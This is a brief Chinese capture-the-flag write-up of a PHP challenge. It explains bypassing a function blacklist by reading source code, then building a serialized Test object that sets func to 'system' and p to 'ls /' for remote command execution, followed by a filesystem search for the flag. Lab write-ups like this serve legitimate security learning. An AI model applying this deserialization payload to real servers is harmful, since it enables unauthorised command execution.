一道有关命令执行、反序列化的题目。
打开题目看到私人,心情一下子就愉悦了呢(bushi)
1.打开题目发现一直在刷新,那就抓下包
发现了两个参数,一眼顶针,是php中的data()函数及其参数,尝试rce
2.可惜尝试system、eval、popen等函数都被过滤,但对highlight_file、get_file_content函数没有过滤,那就可以看看码
3.比较烦人的是依旧会刷新,但重点很少
对其内部定义的Test类,且没有过滤unserialize(),所以我们可以尝试构造反序列化内容绕过waf实现rce。
4.反序列化
在线PHP工具:PHP 在线工具 | 菜鸟工具
<?php
Class Test{
public $func = "system";
public $p = "ls /";
}
$a = new Test();
echo serialize($a);
?>
结果当前目录和根目录都没找到flag,那就只能查找了
find / -name f*